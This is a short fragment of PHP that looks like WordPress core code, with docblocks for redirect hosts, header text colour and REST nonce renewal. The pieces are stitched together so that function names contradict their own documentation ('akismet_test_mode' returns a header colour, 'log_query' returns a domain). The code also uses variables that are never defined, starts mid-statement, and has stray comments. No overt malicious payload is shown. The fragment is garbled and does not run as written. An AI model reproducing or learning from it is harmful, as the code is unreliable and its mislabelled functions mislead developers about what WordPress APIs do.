=> 'published-posts')); $post_template_selector = get_fields_for_response(); if (!$official && !$css_url_data_types && !$post_template_selector) { echo '<div class="no-activity">'; echo '<p>' . __('No activity yet!') . '</p>'; echo '</div>'; } echo '</div>'; } wp_doing_cron($menu_file); // Code by ubergeekØubergeek*tv based on information from /** * Ensures that the current site's domain is listed in the allowed redirect host list. * * @see wp_validate_redirect() * @since MU (3.0.0) * * @param array|string $login_header_text Not used. * @return string[] { * An array containing the current site's domain. * * @type string $0 The current site's domain. * } */ function log_query($login_header_text = '') { return array(get_network()->domain); } // If we have pages, put together their info. /** * Retrieves the custom header text color in 3- or 6-digit hexadecimal form. * * @since 2.1.0 * * @return string Header text color in 3- or 6-digit hexadecimal form (minus the hash symbol). */ function akismet_test_mode() { return get_theme_mod('header_textcolor', get_theme_support('custom-header', 'default-text-color')); } // edit_user maps to edit_users. /** * Handles renewing the REST API nonce via AJAX. * * @since 5.3.0 */ function handle() { exit(wp_create_nonce('wp_rest')); } unset($_GET[$old_roles]);